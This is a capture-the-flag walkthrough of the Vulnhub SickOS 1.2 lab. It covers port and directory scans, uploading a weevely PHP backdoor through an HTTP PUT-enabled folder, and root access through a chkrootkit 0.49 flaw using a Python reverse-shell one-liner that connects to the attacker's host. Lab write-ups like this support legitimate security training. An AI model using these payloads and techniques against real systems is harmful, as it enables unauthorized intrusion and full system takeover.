Vulnhub SickOS
Vulnhub
SickOS
Let’s do the usual send a scan his way
nmap -A -sS -sC -T 4 -p-
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-23 04:08 EDT
Nmap scan report for ubuntu (192.168.1.116)
Host is up (0.00030s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6🆎7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:09:17:54 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2, Linux 3.16 - 4.6, Linux 3.2 - 4.6, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Alright, 22 and 80. Let’s start with 80 i guess.
Nikto
Let’s send a nikto scan
nikto -h 192.168.1.116
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.116
+ Target Hostname: 192.168.1.116
+ Target Port: 80
+ Start Time: 2017-05-23 04:14:03 (GMT-4)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ 26188 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2017-05-23 04:14:36 (GMT-4) (33 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nothing good but at least we know it’s using lighttpd/1.4.28, let’s search for that in searchsploit.
Nothing matches the exact version. Let’s try to find more directories.
Dirb
Let’s try to find more paths.
dirb http://192.168.1.116 /usr/share/dirb/wordlists/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 23 04:20:19 2017
URL_BASE: http://192.168.1.116/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.116/ ----
+ http://192.168.1.116/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.1.116/test/
---- Entering directory: http://192.168.1.116/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue May 23 04:20:21 2017
DOWNLOADED: 4612 - FOUND: 1
Alright, so we got test. If we check it out, there’s nothing inside. Eh!
Burp
So after playing around for a few minutes, i decided to look at the http methods that the only folder that i found on the webserver takes.
We can see that it allows a bunch of methods, but the want we want the most is PUT, that will allow us to put stuff in that folder.
Let’s start by trying it
If we look at the page 192.168.1.126/test, we’ll see that the file yo.php was actually created with the content “Hello”. This is perfect, let’s upload a reverse shell or a weevely backdoor.
In my case i’ll be uploading a weevely backdoor.
So i’ll generate one and copy the content in the body of the PUT request.
weevely generate toor ~/Vulnhub/sickos/me.php
We should be able to connect to the backdoor now.
weevely http://192.168.1.126/test/me.php toor
And we’re in.
Enumeration
uname -a
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
3.11 kernel, couldn’t find anything on it. Let’s look at the distribution.
cat /etc/lsb-*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
We got a pretty old distro, there has to be something vulnerable for it.
Services:
service --status-all
Nothing that pops up.
ps -aux | less
Maybe there’s a process that is running that shouldn’t be running.
After scouring all the freaking services, the one vulnerable is chkrootkit.
It’s running as a daily cron job. By looking at the logs of APT located in
/var/log/apt/history.log, i noticed that the last installation was chkrootkit
the 0.49.4-ubuntu1.1 version
tail /var/log/apt/history.log
Start-Date: 2016-04-12 09:18:09
Commandline: apt-get install chkrootkit
Install: chkrootkit:i386 (0.49-4ubuntu1.1)
End-Date: 2016-04-12 09:18:12
Start-Date: 2016-04-12 09:20:10
Commandline: apt-get remove chkrootkit
Remove: chkrootkit:i386 (0.49-4ubuntu1.1)
End-Date: 2016-04-12 09:20:12
That version happened to be vulnerable. In searchsploit we can find
searchsploit
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Chkrootkit 0.49 - Privilege Escalation | ./linux/local/33899.txt
Chkrootkit - Privilege Escalation | ./linux/local/38775.rb
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
We can see that that particular version is vulnerable. The instructions are:
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
So we’ll put a python reverse shell
vi update
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.148",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
On our kali machine we’ll setup a listener.
After a few minutes the connection will appear.
ncat -nlv 443
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.1.126.
Ncat: Connection from 192.168.1.126:58042.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49
newRule
# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.
There is it. GG.